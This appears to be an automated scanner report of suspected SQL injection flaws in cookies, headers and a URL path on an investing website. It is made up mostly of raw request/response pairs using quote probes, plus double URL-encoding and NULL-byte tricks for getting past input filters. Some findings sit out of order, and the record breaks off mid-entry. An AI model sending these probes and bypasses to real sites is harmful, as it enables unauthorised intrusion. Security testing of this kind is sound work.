GET /investor/StockRating/srsmain.asp?1%2527%2527=1 HTTP/1.1 Host: redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response 2
HTTP/1.1 503 Service Unavailable Content-Type: text/html Date: Sun, 30 Jan 2011 18:05:55 GMT Connection: close Content-Length: 28
The MUID cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the MUID cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the MUID cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /investor/StockRating/srstopstocksresults.aspx?sco=1 HTTP/1.1 Host: redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F%2527; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response 1
HTTP/1.1 503 Service Unavailable Connection: close Date: Sun, 30 Jan 2011 02:15:28 GMT Server: Microsoft-IIS/6.0 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" X-UA-Compatible: IE=7 X-Powered-By: ASP.NET Server: TK2MCWBA01 Content-Type: text/html
<html><body><h1>Server is too busy</h1></body></html>
Request 2
GET /investor/StockRating/srstopstocksresults.aspx?sco=1 HTTP/1.1 Host: redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F%2527%2527; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response 2
HTTP/1.1 200 OK Connection: close Date: Sun, 30 Jan 2011 02:15:28 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" X-UA-Compatible: IE=7 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-FRAME-OPTIONS: DENY X-Content-Type-Options: nosniff Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 55922
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"> <meta http-e ...[SNIP]...
The expid cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the expid cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /investor/StockRating/srstopstocksresults.aspx HTTP/1.1 Host: redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2';
Response 1
HTTP/1.1 503 Service Unavailable Content-Type: text/html Date: Sun, 30 Jan 2011 18:05:33 GMT Connection: close Content-Length: 28
<h1>Service Unavailable</h1>
Request 2
GET /investor/StockRating/srstopstocksresults.aspx HTTP/1.1 Host: redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2'';
Response 2
HTTP/1.1 200 OK Connection: close Date: Sun, 30 Jan 2011 18:05:33 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" X-UA-Compatible: IE=7 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-FRAME-OPTIONS: DENY X-Content-Type-Options: nosniff Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 56048
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"> <meta http-e ...[SNIP]...
The v1st cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the v1st cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /investor/StockRating/srstopstocksresults.aspx HTTP/1.1 Host: redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4'; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response 1 (redirected)
HTTP/1.1 200 OK Content-Length: 3080 Content-Type: text/html Last-Modified: Wed, 04 Jun 2008 17:06:59 GMT Accept-Ranges: bytes ETag: "40a29a6665c6c81:16c4d" Server: Microsoft-IIS/6.0 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" X-UA-Compatible: IE=7 X-Powered-By: ASP.NET Date: Sun, 30 Jan 2011 18:05:23 GMT Connection: close
The v1st cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the v1st cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the v1st cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /investor/StockRating/srstopstocksresults.aspx?sco=1 HTTP/1.1 Host: redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4%2527; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response 1
HTTP/1.1 503 Service Unavailable Content-Type: text/html Date: Sun, 30 Jan 2011 02:16:18 GMT Connection: close Content-Length: 28
<h1>Service Unavailable</h1>
Request 2
GET /investor/StockRating/srstopstocksresults.aspx?sco=1 HTTP/1.1 Host: redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4%2527%2527; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response 2
HTTP/1.1 200 OK Connection: close Date: Sun, 30 Jan 2011 02:16:19 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" X-UA-Compatible: IE=7 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-FRAME-OPTIONS: DENY X-Content-Type-Options: nosniff Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 55922
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"> <meta http-e ...[SNIP]...
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
The __qca cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __qca cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /investor/charts/chartdl.aspx HTTP/1.1 Host: redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610'; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response 1 (redirected)
HTTP/1.1 200 OK Content-Length: 3080 Content-Type: text/html Last-Modified: Wed, 04 Jun 2008 17:06:59 GMT Accept-Ranges: bytes ETag: "40a29a6665c6c81:153c9" Server: Microsoft-IIS/6.0 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" X-UA-Compatible: IE=7 X-Powered-By: ASP.NET Date: Sun, 30 Jan 2011 18:05:33 GMT Connection: close
The expid cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the expid cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The v1st cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the v1st cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /investor/charts/chartdl.aspx?symbol= HTTP/1.1 Host: redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4'; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response 1
HTTP/1.1 503 Service Unavailable Content-Type: text/html Date: Sun, 30 Jan 2011 02:16:17 GMT Connection: close Content-Length: 28
<h1>Service Unavailable</h1>
Request 2
GET /investor/charts/chartdl.aspx?symbol= HTTP/1.1 Host: redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4''; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response 2
HTTP/1.1 200 OK Connection: close Date: Sun, 30 Jan 2011 02:16:18 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" X-UA-Compatible: IE=7 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-FRAME-OPTIONS: DENY X-Content-Type-Options: nosniff Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 24661
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"> <meta http-e ...[SNIP]...
The CC cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the CC cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /investor/home.aspx HTTP/1.1 Host: redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US%00'; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response 1
HTTP/1.1 503 Service Unavailable Content-Type: text/html Date: Sun, 30 Jan 2011 18:02:44 GMT Connection: close Content-Length: 28
<h1>Service Unavailable</h1>
Request 2
GET /investor/home.aspx HTTP/1.1 Host: redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US%00''; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response 2
HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 30 Jan 2011 18:02:45 GMT Server: Microsoft-IIS/6.0 Location: http://money.redacted/investing Content-Length: 62
object moved <a href="http://money.msn.com/investing">here</a>
The CULTURE cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the CULTURE cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the CULTURE cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /investor/home.aspx HTTP/1.1 Host: redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CULTURE=EN-US%2527; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response 1
HTTP/1.1 503 Service Unavailable Content-Type: text/html Date: Sun, 30 Jan 2011 18:02:16 GMT Connection: close Content-Length: 28
<h1>Service Unavailable</h1>
Request 2
GET /investor/home.aspx HTTP/1.1 Host: redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CULTURE=EN-US%2527%2527; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response 2
HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 30 Jan 2011 18:02:18 GMT Server: Microsoft-IIS/6.0 Location: http://money.redacted/investing Content-Length: 62
object moved <a href="http://money.msn.com/investing">here</a>
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the User-Agent HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /investor/home.aspx HTTP/1.1 Host: redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527 Connection: close Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response 1
HTTP/1.1 503 Service Unavailable Content-Type: text/html Date: Sun, 30 Jan 2011 18:03:26 GMT Connection: close Content-Length: 28
<h1>Service Unavailable</h1>
Request 2
GET /investor/home.aspx HTTP/1.1 Host: redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527%2527 Connection: close Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response 2
HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 30 Jan 2011 18:03:27 GMT Server: Microsoft-IIS/6.0 Location: http://money.redacted/investing Content-Length: 62
object moved <a href="http://money.msn.com/investing">here</a>
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /investor/market/exchangerates.aspx HTTP/1.1 Host: redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Referer: http://www.google.com/search?hl=en&q=%00'
Response 1 (redirected)
HTTP/1.1 200 OK Content-Length: 3080 Content-Type: text/html Last-Modified: Wed, 04 Jun 2008 17:06:59 GMT Accept-Ranges: bytes ETag: "40a29a6665c6c81:1427c" Server: Microsoft-IIS/6.0 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" X-UA-Compatible: IE=7 X-Powered-By: ASP.NET Date: Sun, 30 Jan 2011 02:16:30 GMT Connection: close
The Sample cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Sample cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the Sample cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /investor/market/exchangerates.aspx HTTP/1.1 Host: redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69%2527; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response 1
HTTP/1.1 503 Service Unavailable Content-Type: text/html Date: Sun, 30 Jan 2011 18:04:26 GMT Connection: close Content-Length: 28
<h1>Service Unavailable</h1>
Request 2
GET /investor/market/exchangerates.aspx HTTP/1.1 Host: redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69%2527%2527; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response 2
HTTP/1.1 200 OK Connection: close Date: Sun, 30 Jan 2011 18:04:27 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" X-UA-Compatible: IE=7 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 28682
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"><head><meta http-e ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /investor%2527/market/treasuries.aspx HTTP/1.1 Host: redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response 1 (redirected)
HTTP/1.1 200 OK Content-Length: 3080 Content-Type: text/html Last-Modified: Wed, 04 Jun 2008 17:06:59 GMT Accept-Ranges: bytes ETag: "40a29a6665c6c81:153c9" Server: Microsoft-IIS/6.0 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" X-UA-Compatible: IE=7 X-Powered-By: ASP.NET Date: Sun, 30 Jan 2011 18:05:47 GMT Connection: close
The s_cc cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_cc cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
